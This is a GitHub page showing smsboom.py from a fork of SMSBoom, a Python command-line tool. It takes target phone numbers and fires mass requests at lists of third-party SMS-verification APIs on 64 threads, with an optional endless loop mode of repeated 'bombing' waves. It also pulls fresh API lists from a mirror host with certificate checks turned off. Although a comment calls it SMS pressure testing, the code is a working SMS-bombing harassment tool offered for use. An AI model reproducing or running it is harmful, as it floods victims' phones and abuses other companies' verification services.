forked from OpenEthan/SMSBoom
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathsmsboom.py
executable file
·136 lines (116 loc) · 4.38 KB
/
smsboom.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
# encoding=utf8
# 短信测压主程序
import json
import pathlib
import sys
import time
from concurrent.futures import ThreadPoolExecutor
from typing import List, Union
import click
import httpx
from utils import default_header
from utils.log import logger
from utils.models import API
from utils.req import reqFunc
# current directory
path = pathlib.Path(__file__).parent
def load_json() -> List[API]:
"""load json for api.json
:return: api list
"""
json_path = pathlib.Path(path, 'api.json')
if not json_path.exists():
logger.error("Json file not exists!")
# return None
raise ValueError
with open(json_path.resolve(), mode="r", encoding="utf8") as j:
try:
datas = json.loads(j.read())
APIs = [
API(**data)
for data in datas
]
logger.success(f"api.json 加载完成 接口数:{len(APIs)}")
return APIs
except Exception as why:
logger.error(f"Json file syntax error:{why}")
# return None
raise ValueError
def load_getapi() -> list:
"""load GETAPI
:return:
"""
json_path = pathlib.Path(path, 'GETAPI.json')
if not json_path.exists():
logger.error("GETAPI.json file not exists!")
# return None
raise ValueError
with open(json_path.resolve(), mode="r", encoding="utf8") as j:
try:
datas = json.loads(j.read())
logger.success(f"GETAPI加载完成,数目:{len(datas)}")
return datas
except Exception as why:
logger.error(f"Json file syntax error:{why}")
# return None
raise ValueError
@click.command()
@click.option("--thread", "-t", help="线程数(默认64)", default=64)
@click.option("--phone", "-p", help="手机号,可传入多个再使用-p传递", prompt=True, required=True, multiple=True)
@click.option('--super', "-s", is_flag=True, help="循环模式")
@click.option('--interval', "-i", default=60, help="循环间隔时间(默认60s)", type=int)
def run(thread: int, phone: Union[str, tuple], interval: int, super: bool = False):
"""传入线程数和手机号启动轰炸,支持多手机号"""
logger.info(f"循环模式:{super},手机号:{phone},线程数:{thread},循环间隔:{interval}")
with ThreadPoolExecutor(max_workers=thread) as pool:
try:
_api = load_json()
_api_get = load_getapi()
except ValueError:
logger.error("读取接口出错!正在重新下载接口数据!....")
update()
sys.exit(1)
i = 0
if super:
while True:
i += 1
logger.success(f"第{i}波轰炸开始!")
for api in _api:
pool.submit(reqFunc, api, phone)
for api_get in _api_get:
pool.submit(reqFunc, api_get, phone)
logger.success(f"第{i}波轰炸提交结束!休息{interval}s.....")
time.sleep(interval)
else:
for api in _api:
pool.submit(reqFunc, api, phone)
for api_get in _api_get:
pool.submit(reqFunc, api_get, phone)
@click.command()
def update():
"""从 github 获取最新接口"""
GETAPI_json_url = f"https://hk1.monika.love/AdminWhaleFall/SMSBoom/master/GETAPI.json"
API_json_url = f"https://hk1.monika.love/AdminWhaleFall/SMSBoom/master/api.json"
logger.info(f"正在从GitHub拉取最新接口!")
try:
with httpx.Client(verify=False, timeout=10) as client:
# print(API_json_url)
GETAPI_json = client.get(
GETAPI_json_url, headers=default_header).content.decode(encoding="utf8")
api_json = client.get(
API_json_url, headers=default_header).content.decode(encoding="utf8")
except Exception as why:
logger.error(f"拉取更新失败:{why}请关闭所有代理软件多尝试几次!")
else:
with open(pathlib.Path(path, "GETAPI.json").absolute(), mode="w", encoding="utf8") as a:
a.write(GETAPI_json)
with open(pathlib.Path(path, "api.json").absolute(), mode="w", encoding="utf8") as a:
a.write(api_json)
logger.success(f"接口更新成功!")
@click.group()
def cli():
pass
cli.add_command(run)
cli.add_command(update)
if __name__ == "__main__":
cli()